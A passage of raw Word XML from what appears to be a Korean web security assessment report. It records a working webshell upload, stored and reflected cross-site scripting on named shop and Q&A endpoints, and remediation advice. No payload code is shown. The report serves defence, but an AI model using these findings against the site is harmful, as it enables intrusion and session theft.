                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1860878" cy="9480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7DB2" id="직선 화살표 연결선 225001604" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:183.8pt;margin-top:19.45pt;width:146.55pt;height:74.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MvNJwIAAF8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMuO0zAU3SPxD5b3NG41LZ2o6Sw6FBYI&#10;Kh4f4Dp2YsmxLds07RLEDyAhISQW7NiOEF+FOv/AtZNmeAkJRBaWH/ece+7xdRYX+0ahHXdeGl3g&#10;8YhgxDUzpdRVgZ8/W9+ZY+QD1SVVRvMCH7jHF8vbtxatzfnE1EaV3CEg0T5vbYHrEGyeZZ7VvKF+&#10;ZCzXcCiMa2iApauy0tEW2BuVTQiZZa1xpXWGce9h97I7xMvELwRn4bEQngekCgzaQhpdGrdxzJYL&#10;mleO2lqyXgb9BxUNlRqSDlSXNFD0wslfqBrJnPFGhBEzTWaEkIynGqCaMfmpmqc1tTzVAuZ4O9jk&#10;/x8te7TbOCTLAk8mU0LGM3KGkaYNXNXx08vj64/o+v3b46sv128+oOO7q6+fr+LeTSz411qfA81K&#10;b1y/8nbjohl74RoklLQPoDWSPVAw2if3D4P7fB8Qg83xfEbmd6FfGJydn83JdBqvJ+t4Ip91Ptzn&#10;pkFxUmAfHJVVHVZGa7ho47ocdPfQhw54AkSw0qiFJOdkSpIUb5Qs11KpeOhdtV0ph3YU+mS9JvD1&#10;uX8IC1Sqe7pE4WDBoOAk1ZXifaTSIDaa0ZWfZuGgeJf8CRdgcyyzyx4bnA8pKWNch/HABNERJkDe&#10;AOxl/wnYx0coT83/N+ABkTIbHQZwI7Vxv5Md9ifJoos/OdDVHS3YmvKQGiNZA12cbrR/cfGZfL9O&#10;8Jv/wvIbAAAA//8DAFBLAwQUAAYACAAAACEAE55Rpd4AAAAKAQAADwAAAGRycy9kb3ducmV2Lnht&#10;bEyPy07DMBBF90j8gzVI7KjTgtI0xKlQBSrbPj7AjYckij0OsdOkf8+wgt2M5ujOucV2dlZccQit&#10;JwXLRQICqfKmpVrB+fTxlIEIUZPR1hMquGGAbXl/V+jc+IkOeD3GWnAIhVwraGLscylD1aDTYeF7&#10;JL59+cHpyOtQSzPoicOdlaskSaXTLfGHRve4a7DqjqNTUO33ppv76fzdjS/2IN9vm+XnTqnHh/nt&#10;FUTEOf7B8KvP6lCy08WPZIKwCp7TdcooD9kGBANpmqxBXJjMshXIspD/K5Q/AAAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhACxYy80nAgAAXwQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhABOeUaXeAAAACgEAAA8AAAAAAAAAAAAAAAAAgQQAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACMBQAAAAA=&#10;" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00134635">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251611136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39E4B2EE" wp14:editId="51A27CA2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2937510</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>39370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2490470" cy="207818"/>
                <wp:effectExtent l="0" t="0" r="24130" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="494460253" name="직사각형 494460253"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2490470"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9AAEC" id="직사각형 494460253" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:231.3pt;margin-top:3.1pt;width:196.1pt;height:16.3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EiuQIAAKIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNNkl23ajZqtVq0VI&#10;ValoUc9ex95Ecmxjeze73Mo7IPEGXDjwXKi8A2M7ya5KxQGRg2N7Zr7xfPNzdr5tBNowY2slCzw6&#10;SjFikqqylqsCf7hbvDrFyDoiSyKUZAXeMYvPZy9fnLU6Z2NVKVEygwBE2rzVBa6c03mSWFqxhtgj&#10;pZkEIVemIQ6OZpWUhrSA3ohknKbHSatMqY2izFq4vYxCPAv4nDPq3nFumUOiwPA2F1YT1qVfk9kZ&#10;yVeG6Kqm3TPIP7yiIbUEpwPUJXEErU39B1RTU6Os4u6IqiZRnNeUhRggmlH6JJrbimgWYgFyrB5o&#10;sv8Pll5vbgyqywJn0yw7TseT1xhJ0kCqHr89PH7+/vPHw6+vX9BeCoy12uZgeKtvTHeysPXhb7lp&#10;/B8CQ9vA8m5gmW0donA5zqZpdgLJoCAbpyeno1OfhmRvrY11b5hqkN8U2EAWA7lkc2VdVO1VvDOp&#10;FrUQcE9yIVELZThNJ2mwsErUpZd6oTWr5YUwaEOgGBaLFL7O8YEaPENIeI2PMUYVdm4nWHTwnnHg&#10;y8cRPfhKZQMsoZRJN4qiipQsepscOustQsxCAqBH5vDKAbsD6DUjSI8dGej0vSkLhT4Yd6H/zXiw&#10;CJ6VdINxU0tlnotMQFSd56jfkxSp8SwtVbmDajIqtpnVdFFDBq+IdTfEQF9B0mFWuHewcKEgU6rb&#10;YVQp8+m5e68P5Q5SjFro0wLbj2tiGEbirYRGmI6yzDd2OGSTkzEczKFkeSiR6+ZCQfZHMJU0DVuv&#10;70S/5UY19zBS5t4riIik4LvA1Jn+cOHi/IChRNl8HtSgmTVxV/JWUw/uWfUVere9J0Z3ZeygAa5V&#10;39Mkf1LNUddbSjVfO8XrUOp7Xju+YRCEwumGlp80h+egtR+ts98AAAD//wMAUEsDBBQABgAIAAAA&#10;IQCOX8Hw3gAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqIMpaQjZVICE&#10;EIgDlPbuJtskqr2OYjcJf485wXE0o5k3xXq2Row0+M4xwvUiAUFcubrjBmH79XyVgfBBc62NY0L4&#10;Jg/r8vys0HntJv6kcRMaEUvY5xqhDaHPpfRVS1b7heuJo3dwg9UhyqGR9aCnWG6NVEmSSqs7jgut&#10;7umppeq4OVmED3c8SLNT6m31+KJWrzabmvEd8fJifrgHEWgOf2H4xY/oUEamvTtx7YVBWKYqjVGE&#10;VIGIfna7jFf2CDfZHciykP8PlD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAkypxIrkC&#10;AACiBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAjl/B&#10;8N4AAAAIAQAADwAAAAAAAAAAAAAAAAATBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00576696">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49934762" wp14:editId="61944424">
            <wp:extent cx="4572000" cy="1921778"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="5807174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4588" name="그림 1"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="20" b="20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19217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43E68" w14:textId="2424C30F" w:rsidR="00267727" w:rsidRPr="00232CBC" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc209094597"/>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24</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>업로드된 웹쉘 파일 작동 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="1A5BE06E" w14:textId="68EF4B2A" w:rsidR="00267727" w:rsidRPr="0008234B" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D48DFC" w14:textId="77777777" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="003240A2">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190"/>
        <w:gridCol w:w="4890"/>
      </w:tblGrid>
      <w:tr w:rsidR="003240A2" w:rsidRPr="00B112DB" w14:paraId="50259704" w14:textId="77777777" w:rsidTr="00226996">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4057E380" w14:textId="77777777" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="0022699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190" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06BF6F02" w14:textId="77777777" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="002269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9125A78" w14:textId="77777777" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="002269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3240A2" w:rsidRPr="00B112DB" w14:paraId="1BD0D646" w14:textId="77777777" w:rsidTr="002269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4D1F642C" w14:textId="0673F1CD" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="00226996">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52BF28" w14:textId="68C5455B" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="00226996">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003240A2">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인</w:t>
            </w:r>
            <w:r w:rsidRPr="003240A2">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 페이지 &gt; 고객센터 &gt;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97C2CD6" w14:textId="239E7117" w:rsidR="003240A2" w:rsidRPr="00CB22A6" w:rsidRDefault="003240A2" w:rsidP="00226996">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00152C12">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/qna/</w:t>
            </w:r>
            <w:r w:rsidRPr="006D6364">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>openQnaList.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003240A2" w:rsidRPr="00B112DB" w14:paraId="28EF7BFA" w14:textId="77777777" w:rsidTr="002269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203A549B" w14:textId="290FFFFE" w:rsidR="003240A2" w:rsidRDefault="003240A2" w:rsidP="0022699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2</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CC8590" w14:textId="0EABF093" w:rsidR="003240A2" w:rsidRDefault="003240A2" w:rsidP="0022699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 &gt; 상품평</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92CDB8C" w14:textId="10653B74" w:rsidR="003240A2" w:rsidRPr="00987A57" w:rsidRDefault="003240A2" w:rsidP="00226996">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003955B4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF6AEC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>goodsDetail.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75660FFE" w14:textId="77777777" w:rsidR="003240A2" w:rsidRPr="001E4BC6" w:rsidRDefault="003240A2" w:rsidP="003240A2"/>
    <w:p w14:paraId="67807A8F" w14:textId="77777777" w:rsidR="003240A2" w:rsidRDefault="003240A2" w:rsidP="003240A2">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F238B0F" w14:textId="3917D370" w:rsidR="003240A2" w:rsidRPr="00367091" w:rsidRDefault="00367091" w:rsidP="003240A2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00367091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r w:rsidRPr="00367091">
        <w:t xml:space="preserve"> 입력 값에 대한 철저한 검증과 필터링을 적용하여 악성 스크립트 및 파일의 삽입을 차단해야 합니다. 실행 가능한 파일 형식이나 위험 확장자에 대한 업로드를 제한하고, 업로드된 파일에 대해서는 정기적인 악성코드 검사를 수행하여 웹쉘과 같은 악성 콘텐츠의 침투를 사전에 방지해야 합니다. 또한 발견된 악성 콘텐츠는 즉시 삭제하고 재발 방지를 위한 원인 분석 및 보완 조치를 시행해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD23373" w14:textId="77777777" w:rsidR="00267727" w:rsidRDefault="00267727">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00267727">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AD25B" w14:textId="1E479CF8" w:rsidR="00910D06" w:rsidRDefault="00EE7B92" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc209094559"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>크로스사이트 스크립팅</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w14:paraId="40B4B7D6" w14:textId="77777777" w:rsidR="00910D06" w:rsidRDefault="00910D06" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED616F" w14:textId="045B3062" w:rsidR="00910D06" w:rsidRDefault="0087477B" w:rsidP="0087477B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 입력값에 대한 필터링이 제대로 이루어지지 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>않을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 경우, 공격자는 사용자 입력값을 받는 게시판, URL 등에 악의적인</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 스크립트</w:t>
      </w:r>
      <w:r>
        <w:t>(Javascript, VBScript, ActiveX, Flash 등)를 삽입</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하여 게시물이나 </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 접속하는 사용자들의 쿠키 및 세션을 탈취하거나 악성코드를 유포하는 사이트로 유도할 수 있</w:t>
      </w:r>
      <w:r w:rsidR="00D23D53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>습니</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302454C1" w14:textId="77777777" w:rsidR="0087477B" w:rsidRDefault="0087477B" w:rsidP="0087477B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75BFD555" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68214D" w14:textId="2637CECF" w:rsidR="00910D06" w:rsidRDefault="007C04E2" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>점검 결과,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">메인 검색창에 </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">reflected </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>크로스사이트 스크립팅,</w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시판,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">상품 리뷰 등록 페이지 챗봇 등에서 </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>크로스사이트 스크립팅이 확인되었습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이러한 문제점들은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>태그를 필터링하지 않아 해당 태그가 실행되어 악성 스크립트가 구동되</w:t>
      </w:r>
      <w:r w:rsidR="00243D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>기 때문에 발생합니다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>추가적으로 상품 문의,</w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공지사항,</w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FAQ, </w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상품등록,</w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿠폰등록 페이지에서도 </w:t>
      </w:r>
      <w:r w:rsidR="00874987">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidR="00874987">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">크로스사이트 스크립팅이 </w:t>
      </w:r>
      <w:r w:rsidR="00D21D98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>확인되었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364433A" w14:textId="3546E44B" w:rsidR="00910D06" w:rsidRDefault="00910D06" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FB60B8" w14:textId="09DBFED2" w:rsidR="00AA5BEB" w:rsidRDefault="00AA5BEB" w:rsidP="00AA5BEB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
